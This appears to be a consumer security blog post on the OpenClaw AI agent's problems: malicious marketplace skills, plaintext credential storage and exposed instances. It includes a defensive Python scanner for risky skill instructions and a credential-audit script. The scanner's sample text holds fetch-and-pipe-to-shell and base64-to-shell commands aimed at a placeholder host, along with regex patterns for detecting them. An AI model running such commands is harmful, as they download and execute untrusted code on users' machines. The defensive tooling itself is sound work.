
The Clawdbot / Moltbot / OpenClaw Fiasco – Part 2
Update to: Current Status of OpenClaw – What Home Users Should Know
OpenClaw — the AI assistant formerly known as Clawdbot and briefly Moltbot — was one of the viral technology stories last month. It’s an open-source AI agent that runs locally on users’ machines, connects to messaging apps like WhatsApp or Telegram, and can automate tasks such as managing calendars, sending messages, or executing scripts on your system.
But what started as a fascinating experiment quickly turned into a widespread security cautionary tale, especially for macOS users and home consumers.
What OpenClaw Is
OpenClaw is an autonomous AI agent that can:
- Run on your local computer (Mac, Windows, Linux).
- Interact with apps and services (e.g., email, calendar, file system).
- Execute actions like running shell commands or managing files and messaging.
It’s not just a chatbot — it can actually perform actions on your computer, which is why it grabbed attention so quickly: it felt like AI with “hands” that do real, automated work.
Why It Blew Up — Rapid Adoption
After debuting in late 2025 as Clawdbot, the project quickly passed 100,000 stars on GitHub and was rebranded twice (from Clawdbot to Moltbot to OpenClaw) in less than two weeks.
It became so popular that a related side project — Moltbook, a Reddit-style social network for AI agents — went viral.
Security Issues That Emerged
However, the excitement around OpenClaw quickly turned into warnings from researchers and security experts — and here’s why:
Malicious Skills and Supply-Chain Risks
OpenClaw uses an open skill marketplace called ClawHub, where users can download “skills” — plugins that extend the assistant’s functionality.
Researchers discovered that:
- Hundreds of skills were malicious, instructing users to run commands that delivered malware.
- These skills often masqueraded as crypto tools or utilities, tricking users into executing shell scripts that installed infostealers and backdoors.
This is fundamentally a supply-chain attack — malicious code delivered through third-party extensions users believe are legitimate.
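A skill's setup instructions can be screened before anyone pastes them into Terminal. The following is an added example, not code from OpenClaw or ClawHub: it treats a skill's instructions as plain text and flags lines that hand downloaded or decoded content directly to a shell. The rule set, the function name scan_skill and the sample text are assumptions made for illustration.

```python
import re

# Heuristic rules (chosen for this example) for steps that hand downloaded or
# decoded content straight to a shell. Legitimate installers use these forms
# too, so a hit means "read the script before running it", not "malware".
SHELL = r"(?:sudo\s+)?(?:ba|z)?sh\b"
RULES = [
    ("download piped to shell",
     re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*" + SHELL)),
    ("base64 decoded into shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^\n|]*\|\s*" + SHELL)),
    ("shell executes a download via $(...)",
     re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b")),
]


def scan_skill(text):
    """Return (line_number, rule_name) for every risky instruction line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((n, name))
    return hits


# Constructed sample; not a real ClawHub skill. example.invalid never resolves.
SAMPLE_SKILL = """\
# Wallet Helper
Before first use, open Terminal and paste:
    curl -fsSL https://example.invalid/setup.sh | bash
If that fails, run:
    echo "ZWNobyBoZWxsbw==" | base64 -d | sh
Download the manual with: curl -O https://example.invalid/manual.pdf
"""

if __name__ == "__main__":
    for n, name in scan_skill(SAMPLE_SKILL):
        print(f"line {n}: {name}")
```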
Credential Storage Problems
Security analysts found that OpenClaw stored API keys, tokens, and login credentials in plain text in local directories like ~/.clawdbot — even after users deleted them.
This kind of insecure credential storage can expose sensitive accounts and data to anyone who gains access to your machine.
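To see whether this applies to your own machine, the directory can be audited without printing any secret. The following is an added example, not part of OpenClaw: it walks a directory, reports files readable by other accounts, and reports lines that look like a stored key or token, showing only the key name. The regular expression, the function names and the file names in the constructed demo are assumptions; only ~/.clawdbot comes from the article.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Key names that usually hold credentials, followed by a value of 8+ characters.
SECRET_RE = re.compile(
    r"([\w.-]*(?:api[_-]?key|token|secret|password))[\"']?\s*[:=]\s*[\"']?"
    r"([^\s\"',]{8,})", re.IGNORECASE)


def audit_dir(root):
    """Return (file, issue, detail) findings; secret values are never echoed."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        rel = str(path.relative_to(root))
        mode = stat.S_IMODE(path.stat().st_mode)
        if mode & 0o077:  # any group/other permission bit set
            findings.append((rel, "loose permissions", oct(mode)))
        try:
            lines = path.read_text(errors="replace").splitlines()
        except OSError:
            continue
        for n, line in enumerate(lines, 1):
            m = SECRET_RE.search(line)
            if m:
                findings.append((rel, "plaintext secret", f"line {n}: {m.group(1)}"))
    return findings


def demo():
    """Build a constructed directory (file names are made up) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        cfg = Path(tmp, "config.json")
        cfg.write_text('{\n  "model": "example",\n  "api_key": "sk-constructed-000000"\n}\n')
        os.chmod(cfg, 0o644)
        bak = Path(tmp, "config.json.bak")  # constructed: key left in a backup copy
        bak.write_text("TELEGRAM_TOKEN=0000000000:constructed\n")
        os.chmod(bak, 0o600)
        return audit_dir(tmp)


if __name__ == "__main__":
    target = Path.home() / ".clawdbot"  # directory named in the article
    for finding in (audit_dir(target) if target.is_dir() else demo()):
        print(*finding, sep="  |  ")
```

Any key the audit reports should be revoked and reissued at the provider, since deleting the file does not invalidate a credential that was already readable.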
Configuration and Exposure Issues
Independent research revealed that thousands of instances of OpenClaw and its earlier names were internet-exposed and vulnerable, due to lack of proper access controls. These instances could leak API tokens and allow attackers to run commands remotely.
Social Engineering and Confusion
The frequent name changes (Clawdbot → Moltbot → OpenClaw) and rapid refactoring made it easy for scammers to:
- Clone repositories with fake code
- Set up malicious sites with confusing URLs
- Create fake extensions in marketplaces like Visual Studio Code
This confusion amplified the security risk because users couldn’t easily know what code was authentic.
Expert Opinions & Cautionary Perspectives
Cybersecurity professionals have sounded strong warnings:
- Some experts — including AI safety advocate Gary Marcus — urged people not to use OpenClaw at all due to inherent security risks.
- Security advisories describe OpenClaw’s capability to deeply access or control systems as a potential entry point for malware if poorly vetted skills or configurations are used.
Meanwhile, academic research on agent ecosystems like Moltbook highlights that autonomous agents can share instructions that lead to risky actions, underscoring the unpredictable nature of these systems.
Where Things Stand Now
At the time of writing:
- OpenClaw remains popular and is actively developed.
- However, numerous security concerns have not been “solved” — they continue to be active issues for users and researchers.
- Many cybersecurity pros recommend avoiding OpenClaw unless you are highly experienced and understand the risks.
What This Means for macOS Users
For home macOS users, OpenClaw highlights broader lessons about AI-powered tools that can execute actions on your system:
- Just because software is open source doesn’t mean it’s safe out of the box.
- Tools that need deep system access (like executing shell commands) carry real risk.
- Third-party extensions/skills are a major attack surface.
- If you’re not sure what a skill does at a technical level, it’s safest not to install it.
These are the same principles we apply when talking about macOS security generally — only install software you trust, and understand the risks before giving deep permissions.
Resources Used — References & Further Reading
- Wikipedia: OpenClaw, Moltbook
- Android Headlines: OpenClaw Explained
- CyberInsider: 341 OpenClaw skills distribute macOS malware via ClickFix instructions
- Cyber Security News: OpenClaw AI Agent Skills Abused
- XDA Developers: Please stop using OpenClaw
- Igor’s Labs: How simple changes open the door to hackers and fraudsters
- Hunt.io: Hunting OpenClaw Exposures
- BitDefender: Technical Advisory: OpenClaw Exploitation in Enterprise Networks